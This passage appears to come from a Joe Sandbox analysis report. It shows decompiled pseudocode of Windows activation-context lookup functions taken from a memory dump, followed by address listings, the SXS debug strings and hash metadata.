																															_v68 = _t151;
																															goto L102;
																														}
																													}
																												}
																											}
																										} else {
																											_t203 = _t190 - 1;
																											if(_t203 == 0) {
																												L68:
																												_v60 = 0;
																												_t151 =  *((intOrPtr*)(_v52 + 0x1f8));
																												_v68 = _t151;
																												if(_t151 == 0) {
																													goto L44;
																												} else {
																													_t176 = 2;
																													_v20 = 2;
																													goto L28;
																												}
																											} else {
																												if(_t203 != 1) {
																													goto L27;
																												} else {
																													L44:
																													_v60 = 0xfffffffc;
																													_t151 =  *((intOrPtr*)(_v52 + 0x200));
																													_v68 = _t151;
																													if(_t151 == 0) {
																														goto L27;
																													} else {
																														_t176 = 3;
																														_v20 = 3;
																														goto L28;
																													}
																												}
																											}
																										}
																									} else {
																										L27:
																										if(_t176 > 3) {
																											_t129 = 0xc00000e5;
																											goto L30;
																										} else {
																											L28:
																											if(_t151 != 0) {
																												_t129 = E1D75A600(_t151, _a8, _a12,  &_v64,  &_v56);
																												if(_t129 < 0) {
																													_t219 = 0;
																													if(_t129 != 0xc0150001 || _t176 == 3) {
																														goto L48;
																													} else {
																														_t151 = _v68;
																														_t217 = _v40;
																														continue;
																													}
																												} else {
																													_t177 = _v60;
																													_v16 = (0 | _t177 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t177 == 0x00000000;
																													asm("sbb edx, edx");
																													_t219 =  ~(_t177 - 0xfffffffc) & _t177;
																													_t129 = 0;
																													L48:
																													if(_t129 < 0) {
																														goto L31;
																													} else {
																														if(_t219 != 0) {
																															_t125 = _t219 - 1; // -1
																															if((_t125 | 0x00000007) != 0xffffffff &&  *_t219 != 0x7fffffff) {
																																while(1) {
																																	_t236 =  *_t219;
																																	if(_t236 == 0x7fffffff) {
																																		goto L50;
																																	}
																																	asm("lock cmpxchg [edx], ecx");
																																	if(_t236 != _t236) {
																																		continue;
																																	} else {
																																		goto L50;
																																	}
																																	goto L112;
																																}
																															}
																														}
																														L50:
																														_t234 = _t219;
																														goto L51;
																													}
																												}
																											} else {
																												_t129 = 0xc0150001;
																												L30:
																												if(_t129 >= 0) {
																													L51:
																													_t173 = _v56;
																													if(_t173 >= 0x2c) {
																														goto L22;
																													} else {
																														goto L110;
																													}
																												} else {
																													L31:
																													if(_t129 == 0xc0150001) {
																														_t129 = 0xc0150008;
																													}
																													goto L33;
																												}
																											}
																										}
																									}
																									goto L112;
																								}
																							}
																						}
																						goto L112;
																					}
																					L111:
																					_push(_t173);
																					E1D7CEF10(0x33, 0, "RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section\n", _t138);
																					_t129 = 0xc0150003;
																					goto L33;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L112;
													L34:
													_t136 = _t135 - 1;
													if(_t136 == 0) {
														goto L14;
													} else {
														if(_t136 != 1) {
															goto L87;
														} else {
															goto L36;
														}
													}
													goto L112;
												}
											}
										} else {
											if(_t130 + 0x2c >  *_t130 + _t130) {
												_push(0xc000000d);
												_push("RtlpFindActivationContextSection_CheckParameters");
												_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
												L82:
												_push(0);
												_push(0x33);
												E1D7CEF10();
												goto L83;
											} else {
												_t130 = _a20;
												goto L9;
											}
										}
									}
								}
							}
						}
					}
				}
				L112:
			}


























































                                                                                                                              0x1d75a178
                                                                                                                              0x1d75a17f
                                                                                                                              0x1d75a182
                                                                                                                              0x1d75a18f
                                                                                                                              0x1d75a4b4
                                                                                                                              0x00000000
                                                                                                                              0x1d7a77ce
                                                                                                                              0x1d7a77ce
                                                                                                                              0x00000000
                                                                                                                              0x1d7a77ce
                                                                                                                              0x1d75a195
                                                                                                                              0x1d75a195
                                                                                                                              0x1d75a199
                                                                                                                              0x1d75a1a1
                                                                                                                              0x1d75a1a9
                                                                                                                              0x1d75a1b1
                                                                                                                              0x1d7a77f3
                                                                                                                              0x1d7a77f3
                                                                                                                              0x00000000
                                                                                                                              0x1d75a1b7
                                                                                                                              0x1d75a1b7
                                                                                                                              0x1d75a1c0
                                                                                                                              0x00000000
                                                                                                                              0x1d75a1c6
                                                                                                                              0x1d75a1c6
                                                                                                                              0x1d75a1cc
                                                                                                                              0x1d75a5dc
                                                                                                                              0x00000000
                                                                                                                              0x1d75a5e2
                                                                                                                              0x00000000
                                                                                                                              0x1d75a5e2
                                                                                                                              0x1d75a1d2
                                                                                                                              0x1d75a1d4
                                                                                                                              0x00000000
                                                                                                                              0x1d75a1da
                                                                                                                              0x1d75a1da
                                                                                                                              0x1d75a1dd
                                                                                                                              0x00000000
                                                                                                                              0x1d75a1e3
                                                                                                                              0x1d75a1e3
                                                                                                                              0x1d75a1e6
                                                                                                                              0x1d75a1fa
                                                                                                                              0x1d75a1fd
                                                                                                                              0x1d75a5f0
                                                                                                                              0x00000000
                                                                                                                              0x1d75a5f6
                                                                                                                              0x1d7a77fd
                                                                                                                              0x1d7a7802
                                                                                                                              0x1d7a7807
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7807
                                                                                                                              0x1d75a203
                                                                                                                              0x1d75a203
                                                                                                                              0x1d75a208
                                                                                                                              0x1d75a20b
                                                                                                                              0x1d75a20f
                                                                                                                              0x1d75a216
                                                                                                                              0x1d75a21c
                                                                                                                              0x1d75a224
                                                                                                                              0x1d75a228
                                                                                                                              0x1d75a22b
                                                                                                                              0x1d75a233
                                                                                                                              0x1d75a23b
                                                                                                                              0x1d75a23f
                                                                                                                              0x1d75a243
                                                                                                                              0x1d75a247
                                                                                                                              0x1d75a250
                                                                                                                              0x1d75a252
                                                                                                                              0x1d75a255
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75a25b
                                                                                                                              0x1d75a263
                                                                                                                              0x1d75a26f
                                                                                                                              0x1d75a26f
                                                                                                                              0x1d75a277
                                                                                                                              0x1d75a27d
                                                                                                                              0x1d75a3ae
                                                                                                                              0x1d75a3ae
                                                                                                                              0x1d75a3b4
                                                                                                                              0x1d75a3be
                                                                                                                              0x1d7a7823
                                                                                                                              0x1d7a7826
                                                                                                                              0x00000000
                                                                                                                              0x1d7a782c
                                                                                                                              0x1d7a782c
                                                                                                                              0x00000000
                                                                                                                              0x1d7a782c
                                                                                                                              0x1d75a3c4
                                                                                                                              0x1d75a3c4
                                                                                                                              0x1d75a3c9
                                                                                                                              0x00000000
                                                                                                                              0x1d75a3c9
                                                                                                                              0x1d75a283
                                                                                                                              0x1d75a283
                                                                                                                              0x1d75a288
                                                                                                                              0x00000000
                                                                                                                              0x1d75a288
                                                                                                                              0x1d75a265
                                                                                                                              0x1d75a265
                                                                                                                              0x1d75a269
                                                                                                                              0x1d75a4bf
                                                                                                                              0x1d75a4c2
                                                                                                                              0x1d75a4c8
                                                                                                                              0x1d75a4e3
                                                                                                                              0x1d7a780e
                                                                                                                              0x00000000
                                                                                                                              0x1d75a4e9
                                                                                                                              0x1d75a4ec
                                                                                                                              0x1d7a7819
                                                                                                                              0x00000000
                                                                                                                              0x1d75a4f2
                                                                                                                              0x1d75a4f2
                                                                                                                              0x00000000
                                                                                                                              0x1d75a4f2
                                                                                                                              0x1d75a4ec
                                                                                                                              0x1d75a4ca
                                                                                                                              0x1d75a4ca
                                                                                                                              0x1d75a4cc
                                                                                                                              0x00000000
                                                                                                                              0x1d75a4d2
                                                                                                                              0x1d75a4d2
                                                                                                                              0x1d75a4d2
                                                                                                                              0x1d75a4d7
                                                                                                                              0x1d75a28c
                                                                                                                              0x1d75a28e
                                                                                                                              0x1d7a7833
                                                                                                                              0x1d7a7838
                                                                                                                              0x1d7a7838
                                                                                                                              0x00000000
                                                                                                                              0x1d75a294
                                                                                                                              0x1d75a2a5
                                                                                                                              0x1d75a2ac
                                                                                                                              0x1d75a3d2
                                                                                                                              0x1d75a3d9
                                                                                                                              0x00000000
                                                                                                                              0x1d75a3e8
                                                                                                                              0x1d75a3e8
                                                                                                                              0x1d75a3ec
                                                                                                                              0x1d75a3f0
                                                                                                                              0x00000000
                                                                                                                              0x1d75a3f0
                                                                                                                              0x1d75a2b2
                                                                                                                              0x1d75a2b2
                                                                                                                              0x1d75a2d2
                                                                                                                              0x1d75a2d6
                                                                                                                              0x1d75a2d8
                                                                                                                              0x1d75a2da
                                                                                                                              0x1d75a2dc
                                                                                                                              0x1d75a2de
                                                                                                                              0x1d7a783a
                                                                                                                              0x1d7a783c
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7842
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7842
                                                                                                                              0x1d75a2e4
                                                                                                                              0x1d75a2e4
                                                                                                                              0x1d75a2e4
                                                                                                                              0x1d75a2eb
                                                                                                                              0x1d7a78ed
                                                                                                                              0x1d7a78ed
                                                                                                                              0x00000000
                                                                                                                              0x1d75a2f1
                                                                                                                              0x1d75a2f1
                                                                                                                              0x1d75a300
                                                                                                                              0x1d75a300
                                                                                                                              0x1d75a300
                                                                                                                              0x1d75a30a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75a310
                                                                                                                              0x1d75a325
                                                                                                                              0x1d75a32c
                                                                                                                              0x1d75a4f7
                                                                                                                              0x1d75a500
                                                                                                                              0x1d75a502
                                                                                                                              0x1d75a505
                                                                                                                              0x1d75a50b
                                                                                                                              0x1d75a5a5
                                                                                                                              0x1d75a5b8
                                                                                                                              0x1d75a5be
                                                                                                                              0x1d75a5c2
                                                                                                                              0x1d75a5cb
                                                                                                                              0x1d75a5d1
                                                                                                                              0x1d75a5d1
                                                                                                                              0x1d75a5cb
                                                                                                                              0x1d75a50b
                                                                                                                              0x1d75a523
                                                                                                                              0x1d75a549
                                                                                                                              0x1d75a551
                                                                                                                              0x1d75a525
                                                                                                                              0x1d75a53c
                                                                                                                              0x1d75a543
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75a543
                                                                                                                              0x1d75a332
                                                                                                                              0x1d75a337
                                                                                                                              0x1d75a393
                                                                                                                              0x1d75a399
                                                                                                                              0x1d75a339
                                                                                                                              0x1d75a339
                                                                                                                              0x1d75a342
                                                                                                                              0x1d75a344
                                                                                                                              0x1d75a34a
                                                                                                                              0x1d75a34e
                                                                                                                              0x1d75a355
                                                                                                                              0x1d75a359
                                                                                                                              0x00000000
                                                                                                                              0x1d75a360
                                                                                                                              0x1d75a363
                                                                                                                              0x1d75a3fa
                                                                                                                              0x1d75a3fc
                                                                                                                              0x1d7a7847
                                                                                                                              0x1d7a784f
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7855
                                                                                                                              0x1d7a7855
                                                                                                                              0x1d7a7859
                                                                                                                              0x00000000
                                                                                                                              0x1d7a785f
                                                                                                                              0x1d7a785f
                                                                                                                              0x1d7a7862
                                                                                                                              0x1d7a7868
                                                                                                                              0x1d7a7892
                                                                                                                              0x1d7a7894
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a786a
                                                                                                                              0x1d7a786d
                                                                                                                              0x1d7a787e
                                                                                                                              0x1d7a788b
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7880
                                                                                                                              0x1d7a7880
                                                                                                                              0x1d7a7885
                                                                                                                              0x1d7a789a
                                                                                                                              0x1d7a789a
                                                                                                                              0x1d7a789f
                                                                                                                              0x00000000
                                                                                                                              0x1d7a789f
                                                                                                                              0x1d7a786f
                                                                                                                              0x1d7a7873
                                                                                                                              0x1d7a788e
                                                                                                                              0x1d7a788e
                                                                                                                              0x00000000
                                                                                                                              0x1d7a788e
                                                                                                                              0x1d7a786d
                                                                                                                              0x1d7a7868
                                                                                                                              0x1d7a7859
                                                                                                                              0x1d75a402
                                                                                                                              0x1d75a402
                                                                                                                              0x1d75a405
                                                                                                                              0x1d75a554
                                                                                                                              0x1d75a556
                                                                                                                              0x1d75a55e
                                                                                                                              0x1d75a564
                                                                                                                              0x1d75a56a
                                                                                                                              0x00000000
                                                                                                                              0x1d75a570
                                                                                                                              0x1d75a570
                                                                                                                              0x1d75a575
                                                                                                                              0x00000000
                                                                                                                              0x1d75a575
                                                                                                                              0x1d75a40b
                                                                                                                              0x1d75a40e
                                                                                                                              0x00000000
                                                                                                                              0x1d75a414
                                                                                                                              0x1d75a414
                                                                                                                              0x1d75a418
                                                                                                                              0x1d75a420
                                                                                                                              0x1d75a426
                                                                                                                              0x1d75a42c
                                                                                                                              0x00000000
                                                                                                                              0x1d75a432
                                                                                                                              0x1d75a432
                                                                                                                              0x1d75a437
                                                                                                                              0x00000000
                                                                                                                              0x1d75a437
                                                                                                                              0x1d75a42c
                                                                                                                              0x1d75a40e
                                                                                                                              0x1d75a405
                                                                                                                              0x1d75a369
                                                                                                                              0x1d75a369
                                                                                                                              0x1d75a36c
                                                                                                                              0x1d7a78e3
                                                                                                                              0x00000000
                                                                                                                              0x1d75a372
                                                                                                                              0x1d75a372
                                                                                                                              0x1d75a374
                                                                                                                              0x1d75a452
                                                                                                                              0x1d75a459
                                                                                                                              0x1d75a57e
                                                                                                                              0x1d75a585
                                                                                                                              0x00000000
                                                                                                                              0x1d75a594
                                                                                                                              0x1d75a594
                                                                                                                              0x1d75a598
                                                                                                                              0x00000000
                                                                                                                              0x1d75a598
                                                                                                                              0x1d75a45f
                                                                                                                              0x1d75a45f
                                                                                                                              0x1d75a47f
                                                                                                                              0x1d75a483
                                                                                                                              0x1d75a485
                                                                                                                              0x1d75a487
                                                                                                                              0x1d75a489
                                                                                                                              0x1d75a48b
                                                                                                                              0x00000000
                                                                                                                              0x1d75a491
                                                                                                                              0x1d75a493
                                                                                                                              0x1d7a78a8
                                                                                                                              0x1d7a78b1
                                                                                                                              0x1d7a78c3
                                                                                                                              0x1d7a78c3
                                                                                                                              0x1d7a78cb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a78d6
                                                                                                                              0x1d7a78dc
                                                                                                                              0x00000000
                                                                                                                              0x1d7a78de
                                                                                                                              0x00000000
                                                                                                                              0x1d7a78de
                                                                                                                              0x00000000
                                                                                                                              0x1d7a78dc
                                                                                                                              0x1d7a78c3
                                                                                                                              0x1d7a78b1
                                                                                                                              0x1d75a499
                                                                                                                              0x1d75a499
                                                                                                                              0x00000000
                                                                                                                              0x1d75a499
                                                                                                                              0x1d75a48b
                                                                                                                              0x1d75a37a
                                                                                                                              0x1d75a37a
                                                                                                                              0x1d75a37f
                                                                                                                              0x1d75a381
                                                                                                                              0x1d75a49b
                                                                                                                              0x1d75a49b
                                                                                                                              0x1d75a4a2
                                                                                                                              0x00000000
                                                                                                                              0x1d75a4a8
                                                                                                                              0x00000000
                                                                                                                              0x1d75a4a8
                                                                                                                              0x1d75a387
                                                                                                                              0x1d75a387
                                                                                                                              0x1d75a38c
                                                                                                                              0x1d75a38e
                                                                                                                              0x1d75a38e
                                                                                                                              0x00000000
                                                                                                                              0x1d75a38c
                                                                                                                              0x1d75a381
                                                                                                                              0x1d75a374
                                                                                                                              0x1d75a36c
                                                                                                                              0x00000000
                                                                                                                              0x1d75a363
                                                                                                                              0x1d75a360
                                                                                                                              0x1d75a337
                                                                                                                              0x00000000
                                                                                                                              0x1d75a32c
                                                                                                                              0x1d7a78f1
                                                                                                                              0x1d7a78f1
                                                                                                                              0x1d7a78fc
                                                                                                                              0x1d7a7904
                                                                                                                              0x00000000
                                                                                                                              0x1d7a7904
                                                                                                                              0x1d75a2eb
                                                                                                                              0x1d75a2de
                                                                                                                              0x1d75a2ac
                                                                                                                              0x1d75a28e
                                                                                                                              0x1d75a4cc
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75a269
                                                                                                                              0x00000000
                                                                                                                              0x1d75a39c
                                                                                                                              0x1d75a39c
                                                                                                                              0x1d75a39f
                                                                                                                              0x00000000
                                                                                                                              0x1d75a3a5
                                                                                                                              0x1d75a3a8
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75a3a8
                                                                                                                              0x00000000
                                                                                                                              0x1d75a39f
                                                                                                                              0x1d75a250
                                                                                                                              0x1d75a1e8
                                                                                                                              0x1d75a1f1
                                                                                                                              0x1d7a77d8
                                                                                                                              0x1d7a77dd
                                                                                                                              0x1d7a77e2
                                                                                                                              0x1d7a77e7
                                                                                                                              0x1d7a77e7
                                                                                                                              0x1d7a77e9
                                                                                                                              0x1d7a77eb
                                                                                                                              0x00000000
                                                                                                                              0x1d75a1f7
                                                                                                                              0x1d75a1f7
                                                                                                                              0x00000000
                                                                                                                              0x1d75a1f7
                                                                                                                              0x1d75a1f1
                                                                                                                              0x1d75a1e6
                                                                                                                              0x1d75a1dd
                                                                                                                              0x1d75a1d4
                                                                                                                              0x1d75a1cc
                                                                                                                              0x1d75a1c0
                                                                                                                              0x1d75a1b1
                                                                                                                              0x00000000

                                                                                                                              Strings
                                                                                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7A77E2
                                                                                                                              • Actx , xrefs: 1D7A7819, 1D7A7880
                                                                                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D7A77DD, 1D7A7802
                                                                                                                              • SsHd, xrefs: 1D75A304
                                                                                                                              • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 1D7A78F3
                                                                                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D7A7807
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                                              • API String ID: 0-1988757188
                                                                                                                              • Opcode ID: f72ab50188447eadbaf2712d4abbf921f1c64c2ce9b87687a5eebabb600bb2b4
                                                                                                                              • Instruction ID: 71867057538d05476155ee2501279a32238aec17eba6c6df118ad6a039307ec7
                                                                                                                              • Opcode Fuzzy Hash: f72ab50188447eadbaf2712d4abbf921f1c64c2ce9b87687a5eebabb600bb2b4
                                                                                                                              • Instruction Fuzzy Hash: 64E1CE71A083428FD705DE68C894B2BB7E1BF85634F154A3EE966CB290D731E945CB83
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D75D690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 54%
                                                                                                                              			E1D75D690(signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				char _v56;
				char _v60;
				signed int _v64;
				intOrPtr _v68;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int* _v84;
				char _v88;
				signed int _v92;
				char _v93;
				signed int _v104;
				char _v117;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t150;
				char _t158;
				intOrPtr _t160;
				intOrPtr _t163;
				intOrPtr* _t164;
				intOrPtr _t170;
				signed int _t171;
				void* _t172;
				signed int _t195;
				intOrPtr* _t201;
				signed int _t205;
				intOrPtr* _t209;
				void* _t210;
				intOrPtr _t211;
				intOrPtr _t213;
				signed int _t214;
				intOrPtr* _t215;
				intOrPtr _t217;
				intOrPtr _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				void* _t233;
				intOrPtr* _t234;
				signed int _t242;
				void* _t246;
				signed int _t247;
				signed int _t252;
				void* _t253;
				intOrPtr* _t254;
				intOrPtr _t255;
				signed int _t256;
				signed int _t258;

				_t258 = (_t256 & 0xfffffff8) - 0x5c;
				_v8 =  *0x1d83b370 ^ _t258;
				_t217 =  *[fs:0x18];
				_t241 = _a16;
				_t209 = _a20;
				_t150 =  *((intOrPtr*)(_t217 + 0x30));
				_t252 = _a8;
				_v84 = _t241;
				_v80 = _t209;
				if( *((intOrPtr*)(_t150 + 0x1f8)) == 0) {
					if( *((intOrPtr*)(_t150 + 0x200)) != 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t217 + 0x1a8)))) != 0) {
						goto L1;
					} else {
						_t151 = 0xc0150001;
						L24:
						_pop(_t246);
						_pop(_t253);
						_pop(_t210);
						return E1D784B50(_t151, _t210, _v8 ^ _t258, _t241, _t246, _t253);
					}
				}
				L1:
				_v88 = 0;
				if(_t241 == 0) {
					L49:
					_t151 = 0xc000000d;
					goto L24;
				}
				_t241 = _a4;
				if((_t241 & 0xfffffff8) != 0) {
					goto L49;
				}
				if((_t241 & 0x00000007) == 0) {
					if(_t209 != 0) {
						L5:
						if( *_t209 < 0x24) {
							goto L49;
						}
						L6:
						if((_t241 & 0x00000002) != 0) {
							if(_t209 + 0x2c <=  *_t209 + _t209) {
								goto L7;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_flags but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							L48:
							_push(0);
							_push(0x33);
							E1D7CEF10();
							_t258 = _t258 + 0x14;
							goto L49;
						}
						L7:
						if((_t241 & 0x00000004) != 0) {
							if(_t209 + 0x40 <=  *_t209 + _t209) {
								goto L8;
							}
							_push(0xc000000d);
							_push("RtlpFindActivationContextSection_CheckParameters");
							_push("SXS: %s() flags contains return_assembly_metadata but they don\'t fit in size, return invalid_parameter 0x%08lx.\n");
							goto L48;
						}
						L8:
						_t241 =  &_v76;
						_v48 = _a12;
						_v60 = 0x18;
						_v56 = 0;
						_v52 = _t252;
						_v40 = 0;
						_v64 = 0;
						_v44 = 0;
						if(E1D75D580( &_v60,  &_v76,  &_v88,  &_v64) < 0) {
							goto L24;
						}
						_t151 = 0;
						if(0 < 0) {
							goto L24;
						}
						_t158 = _v88;
						if(_t158 < 0x28) {
							L34:
							_t254 = _v76;
							L91:
							_push(_t158);
							E1D7CEF10(0x33, 0, "RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section\n", _t254);
							_t258 = _t258 + 0x14;
							_t151 = 0xc0150003;
							goto L24;
						}
						_t247 = _v64;
						while(1) {
							L12:
							_t254 = _v76;
							if( *_t254 != 0x64487347) {
								goto L91;
							}
							_t211 =  *((intOrPtr*)(_t254 + 0x14));
							_t160 = 1;
							if(_t211 == 0) {
								L19:
								_t225 =  *[fs:0x18];
								_t255 = _v44;
								_v92 = 0;
								_t247 = 0;
								_v68 = _t225;
								_t241 =  *(_t225 + 0x30);
								_v72 = _t241;
								L20:
								while(1) {
									if(_t255 <= 2) {
										_t163 = _t255;
										if(_t163 == 0) {
											_t164 =  *((intOrPtr*)(_t225 + 0x1a8));
											if(_t164 == 0) {
												L43:
												_t213 =  *((intOrPtr*)(_t241 + 0x1f8));
												_v92 = 0;
												if(_t213 == 0) {
													L28:
													_t213 =  *((intOrPtr*)(_t241 + 0x200));
													_v92 = 0xfffffffc;
													if(_t213 == 0) {
														goto L21;
													}
													_t255 = 3;
													_v44 = 3;
													L22:
													if(_t213 != 0) {
														_t241 = _v52;
														_t151 = E1D75A600(_t213, _v52, _v48,  &_v76,  &_v88);
														if(_t151 < 0) {
															if(_t151 != 0xc0150001 || _t255 == 3) {
																L32:
																if(_t151 < 0) {
																	if(_t151 != 0xc0150001) {
																		goto L24;
																	}
																	goto L23;
																}
																_t158 = _v88;
																if(_t158 >= 0x28) {
																	goto L12;
																}
																goto L34;
															} else {
																_t225 = _v68;
																_t241 = _v72;
																continue;
															}
														}
														_t241 = _v92;
														_v40 = (0 | _t241 != 0xfffffffc) - 0x00000001 & 0x00000002 | 0 | _t241 == 0x00000000;
														asm("sbb edi, edi");
														_t247 =  ~(_t241 - 0xfffffffc) & _t241;
														_t151 = 0;
														goto L32;
													}
													L23:
													_t151 = 0xc0150008;
													goto L24;
												}
												_t255 = 2;
												_v44 = 2;
												goto L22;
											}
											_t170 =  *_t164;
											if(_t170 == 0) {
												goto L43;
											}
											_t171 =  *((intOrPtr*)(_t170 + 4));
											_v92 = _t171;
											if(_t171 == 0) {
												L83:
												if(_t213 == 0) {
													goto L43;
												}
												L84:
												_t255 = 1;
												_v44 = 1;
												goto L22;
											}
											if(_t171 != 0xfffffffc) {
												if(_t171 != 0xfffffffd) {
													_t213 =  *((intOrPtr*)(_t171 + 0x10));
													goto L83;
												}
												_t213 = "Actx ";
												goto L84;
											}
											_t213 =  *((intOrPtr*)(_t241 + 0x200));
											goto L83;
										}
										_t172 = _t163 - 1;
										if(_t172 == 0) {
											goto L43;
										}
										if(_t172 != 1) {
											goto L21;
										}
										goto L28;
									}
									L21:
									if(_t255 > 3) {
										_t151 = 0xc00000e5;
										goto L24;
									}
									goto L22;
								}
							}
							if( *((intOrPtr*)(_t254 + 8)) != 1) {
								_t160 = 0;
							}
							_t227 =  *((intOrPtr*)(_t254 + 0x1c));
							if(_t227 != 0) {
								if(_t160 == 0) {
									goto L16;
								}
								_v92 = 0;
								_t233 =  *((intOrPtr*)(_t227 + _t254 + 4)) +  *_v84 %  *(_t227 + _t254) * 8;
								_t234 = _t233 + _t254;
								_t201 =  *((intOrPtr*)(_t233 + _t254 + 4)) + _t254;
								_v72 = _t234;
								if( *_t234 <= 0) {
									goto L19;
								} else {
									goto L54;
								}
								while(1) {
									L54:
									_t214 =  *_t201 + _t254;
									_v68 = _t201 + 4;
									if(E1D798050(_t214, _v84, 0x10) == 0x10) {
										goto L18;
									}
									_t205 = _v92 + 1;
									_v92 = _t205;
									_t201 = _v68;
									if(_t205 <  *_v72) {
										continue;
									}
									goto L19;
								}
							} else {
								L16:
								_t228 =  *((intOrPtr*)(_t254 + 0x18));
								if(( *(_t254 + 0x10) & 0x00000001) == 0) {
									_t174 = _t228 + _t254;
									_v92 = _t228 + _t254;
									while(E1D798050(_t174, _v84, 0x10) != 0x10) {
										_t174 = _v92 + 0x1c;
										_v92 = _v92 + 0x1c;
										_t211 = _t211 - 1;
										if(_t211 != 0) {
											continue;
										}
										goto L19;
									}
									_t214 = _v92;
									L18:
									if(_t214 != 0) {
										if( *((intOrPtr*)(_t214 + 0x10)) == 0) {
											goto L19;
										}
										_t241 = _v80;
										if(_t241 != 0) {
											 *((intOrPtr*)(_t241 + 4)) =  *((intOrPtr*)(_t254 + 0xc));
											 *((intOrPtr*)(_t241 + 8)) =  *((intOrPtr*)(_t214 + 0x10)) + _t254;
											 *((intOrPtr*)(_t241 + 0xc)) =  *((intOrPtr*)(_t214 + 0x14));
											if(_t241 + 0x28 <=  *_t241 + _t241) {
												 *((intOrPtr*)(_t241 + 0x24)) =  *((intOrPtr*)(_t214 + 0x18));
											}
										}
										if((_t247 - 0x00000001 | 0x00000007) != 0xffffffff) {
											_t215 =  *((intOrPtr*)(_t247 + 0x14));
											if(_t215 != 0 && (( *(_t247 + 0x1c) & 0x00000008) == 0 || ( *(_t247 + 0x3c) & 0x00000008) == 0)) {
												_v93 = 0;
												 *0x1d8391e0(3, _t247,  *((intOrPtr*)(_t247 + 0x10)),  *((intOrPtr*)(_t247 + 0x18)), 0,  &_v93);
												 *_t215();
												 *(_t247 + 0x1c) =  *(_t247 + 0x1c) | 0x00000008;
												_t241 = _v104;
												if(_v117 != 0) {
													 *(_t247 + 0x3c) =  *(_t247 + 0x3c) | 0x00000008;
												}
											}
										}
										if(_t241 == 0 || E1D744428(_a4, _t241, _t247,  &_v60, _t254,  *((intOrPtr*)(_t254 + 0x20)),  *((intOrPtr*)(_t254 + 0x24)), _v88) >= 0) {
											_t151 = 0;
										}
										goto L24;
									}
									goto L19;
								}
								_t242 = _v84;
								_v36 =  *_t242;
								_v32 =  *((intOrPtr*)(_t242 + 4));
								_v28 =  *((intOrPtr*)(_t242 + 8));
								_v24 =  *((intOrPtr*)(_t242 + 0xc));
								_t195 = E1D788170( &_v36, _t228 + _t254, _t211, 0x1c, E1D73B600);
								_t258 = _t258 + 0x14;
								_t214 = _t195;
							}
							goto L18;
						}
						goto L91;
					}
					goto L6;
				}
				if(_t209 == 0) {
					goto L49;
				}
				goto L5;
			}




























































                                                                                                                              0x1d75d698
                                                                                                                              0x1d75d6a2
                                                                                                                              0x1d75d6a6
                                                                                                                              0x1d75d6ad
                                                                                                                              0x1d75d6b1
                                                                                                                              0x1d75d6b4
                                                                                                                              0x1d75d6b8
                                                                                                                              0x1d75d6c3
                                                                                                                              0x1d75d6c7
                                                                                                                              0x1d75d6cb
                                                                                                                              0x1d75d90e
                                                                                                                              0x00000000
                                                                                                                              0x1d7a913f
                                                                                                                              0x1d7a913f
                                                                                                                              0x1d75d847
                                                                                                                              0x1d75d84b
                                                                                                                              0x1d75d84c
                                                                                                                              0x1d75d84d
                                                                                                                              0x1d75d858
                                                                                                                              0x1d75d858
                                                                                                                              0x1d75d90e
                                                                                                                              0x1d75d6d1
